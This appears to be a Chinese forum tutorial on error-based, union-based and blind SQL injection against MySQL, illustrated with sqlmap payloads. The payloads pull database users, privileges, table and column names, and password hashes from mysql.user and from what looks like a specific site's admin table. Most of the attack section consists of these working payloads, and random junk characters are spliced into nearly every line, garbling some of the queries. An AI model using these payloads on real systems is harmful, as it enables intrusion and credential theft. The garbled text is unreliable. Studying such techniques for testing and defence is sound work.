放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。' v: p9 ~- N {2 K
0 s! f7 m3 _ j1 e' H& W3 J
这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表
: I( o: |2 u, V* P
1 }' {0 l- G- a" X. o i% d- [$ X分类标准 分类 备注! B2 f3 |/ \1 f7 i
按字段类型 整型注入,字符型注入
) T6 D8 T3 @! N) [按出现的位置 get注入,post注入,cookie注入,http header注入
/ G) p* w( i; m/ d9 ?( U然而高级注入是这样的1 [- m5 [6 f7 W2 A `6 k! t/ b& ?
& z. P7 {1 {. J6 _/ j4 ~
高级注入分类 条件
7 y0 G2 i$ U6 }8 berror-based sql 数据库的错误回显可以返回,存在数据库,表结构' w1 E; _- [5 H" ]: _3 g3 `# S1 \7 W
union-based sql 能够使用union,存在数据库,表结构% s3 \7 J1 C! f# X8 m3 a7 a; M
blind sql 存在注入0 z* c8 p7 h& F) H$ T: ^1 l
我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。
* Z" @8 N l: |) v# T
+ j6 B+ d( F) D5 X9 e( I好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火5 r3 Y& _$ y5 h* S1 n
3 ^7 D, D+ B2 v( q6 j4 c% d$ t
附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。2 y& ]$ k& G/ g0 p) g
+ T F; V) J% ^7 x; N这里用mysql说明6 z- [4 i3 c6 p
0 p# D/ d& [+ s
e注入坛子里很多了,请看戳我或者再戳我% H. m# h" C9 J$ @# l* k
' `* @ J* H9 p( ?3 ^u注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的 B0 {' ~/ B4 F
4 h- q8 G! _7 e
获取当前数据库用户名
# L! T5 d- H3 B- z
7 _& m, g: L! AUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C
F0 o/ n! J4 yAST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL( i# r# k/ i2 G* p" r
L, NULL#
9 W& B. K: K$ `7 {3 ]3 T/ B注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。4 }! F1 x- d/ O' }( V- d- {- u
) o0 C u& e7 ]& e- d5 P获取数据库名
9 d& L6 Q( g. c2 t$ D5 O$ @
* m+ E" b2 I" ?) w' J* a) k! L& tUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
1 K1 ]& A% X" H% c获取所有用户名5 Q3 N& K! _5 i$ I( ^. I
2 \8 B! p" l6 x0 ^ Z' f9 `* {3 I
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#, |3 k% w+ E. e5 d' U( \9 x
查看当前用户权限7 _' l7 [* O8 W- K P! ?* R5 X
V! y8 W3 j1 T. G. q" l; dUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
+ x& i4 H) q% v5 C尝试获取密码,当然需要有能读mysql数据库的权限
" I4 y6 F8 \+ ]: W% L 3 B1 y% t6 j* u) w: c9 i
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#
4 t. C0 i! W2 E: g2 @, H; l获取表名,limit什么的自己搞啦
! v& y$ x. U, y) o
# [5 `" h0 m' W1 h3 [# z6 n7 o+ S# KUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#8 c) i9 @+ j K3 g: Q& _1 Q& X' G" m# U
获取字段名及其类型
+ ]7 M$ {0 M' X) kUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#1 C, X0 i1 }$ x/ H) w( Z6 n x7 Z- f
/ L8 V3 G0 N: f& s/ H5 P
b注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。
0 s. K5 b$ B, R! m & _' U3 X) o' i; B2 ^
如:
, t- F. B* g& ?% i# {6 ^获取当前用户名 A; s% ~0 ~# G. g4 J
$ a& `4 X- a/ gAND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 116. H1 M" U! d% w. }1 {/ K& Z" m
获取当前数据库2 W8 d& {" o- Z* y9 Z! U
K9 u% u& \# Q6 A6 t7 S, r: ]AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 1067 |! n# b' N# c2 n8 `
获取表名
5 @/ m% P: A; d0 t $ d! z6 \2 ]9 _6 r- u; C
AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 51; A- Z6 Z% T) o/ H: t
获取字段名及其类型和爆内容就不说了,改改上面的就可以了。
) q+ Z+ o$ o/ @回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。
+ v' y5 J4 }) q( B# v3 H2 U爆表; ^# e' W4 C7 \# R
6 z; P, v1 S9 ~$ i9 l
AND EXISTS(select * from table)$ ^- p F3 m2 R# b& f7 F% L
爆字段0 A! m! q" Z+ m3 v
( w+ S% p6 t: e* hAND EXISTS(select pwd from table)
9 L9 `9 L* a7 ` V4 b% [盲注的变化就比较多了,由于篇幅,只是举个例子而已。
' T$ e8 v: s3 h5 ^) W
7 f' L: k! I) e, B% H1 I+ W! P本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。' T1 h& @" q1 w
|